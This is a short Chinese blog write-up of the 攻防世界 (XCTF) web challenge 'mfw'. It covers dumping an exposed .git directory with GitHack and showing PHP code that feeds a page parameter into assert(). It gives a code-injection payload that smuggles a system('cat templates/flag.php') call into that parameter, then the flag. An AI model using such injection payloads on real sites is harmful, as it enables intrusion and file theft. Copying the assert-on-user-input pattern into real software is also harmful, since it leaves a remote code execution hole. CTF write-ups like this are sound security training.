-
攻防世界WEB练习-mfw
前言
作者简介:不知名白帽,网络安全学习者。
博客主页:https://blog.csdn.net/m0_63127854?type=blog
攻防世界专栏:https://blog.csdn.net/m0_63127854/category_11983747.html
目录
题目场景
查看about
查看源码
在源码第29行发现了线索
查看.git
怀疑是git代码泄露
GitHack扫描
查看生成的index.php
if (isset($_GET['page'])) {
$page = $_GET['page'];
} else {
$page = "home";
}
$file = "templates/" . $page . ".php";
// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");
?>
分析代码
若想得到flag,即得到"Detected hacking attempt!"
?page=abc') or system("cat templates/flag.php");//
找到flag
cyberpeace{bca4cbeba9a8210128e7542462a2e7d0}
-
相关阅读:
基于ERP集成的流程制造管理系统
学生HTML个人网页作业作品 使用HTML+CSS+JavaScript个人介绍博客网站 web前端课程设计 web前端课程设计代码 web课程设计
记一次Nginx代理Mysql服务的经历
S7-200系列西门子plc简介
OSI协议
软件测试碎碎念:进大厂容易,做自己却很难
4-3 nn.functional和nn.Module
Elasticsearch:使用 Amazon Bedrock 的 semantic_text
【Java项目实战】牛客网论坛项目1 - Spring入门与初识SpringMVC
RabbitMQ开启消息跟踪日志(trace)
- 原文地址:https://blog.csdn.net/m0_63127854/article/details/126671630